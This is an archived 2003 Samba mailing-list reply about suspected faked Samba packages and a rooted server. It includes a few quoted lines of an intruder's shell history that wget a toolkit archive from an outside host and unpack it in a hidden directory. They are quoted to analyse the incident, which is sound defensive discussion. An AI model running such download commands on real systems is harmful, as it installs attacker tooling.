[Samba] Faked samba packages / rootkit?

Andrew Bartlett abartlet at samba.org
Sat Dec 27 21:47:25 GMT 2003

On Sun, 2003-12-28 at 07:27, Markus Schabel wrote:
> Does anybody know of these samba packages?
> http://ftp.cvut.cz/samba/samba-latest.tar.gz

This copy of Samba 3.0.0 matches the signature I downloaded from
samba.org, using GPG.  Your copy may vary however.

> AFAICS they are faked and contain some kind of rootkit (you can see
> this in the history below. the server this history is from is taken
> offline for security reasons, and nobody is there till 7th Jan I
> can't give you more details)

I would suggest the you were running Samba < 2.2.8a, and were rooted by
the commonly available root exploit, and the attacker prefers not to
allow the next passer by to break into your box too.

> >   182  cd .nlp
> >   183  wget geocities.com/st3lly/cmd.tg
> >   184  wget http://geocities.com/st3lly/cmd.tg
> >   185  wget http://geocities.com/st3lly/cmd.tgz
> >   186  tar zxvf cmd.tgz

I would suggest the rootkits start here...

Andrew Bartlett

Andrew Bartlett                                 abartlet at pcug.org.au
Manager, Authentication Subsystems, Samba Team  abartlet at samba.org
Student Network Administrator, Hawker College   abartlet at hawkerc.net
http://samba.org     http://build.samba.org     http://hawkerc.net
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.samba.org/archive/samba/attachments/20031228/fa895a1e/attachment.bin

More information about the samba mailing list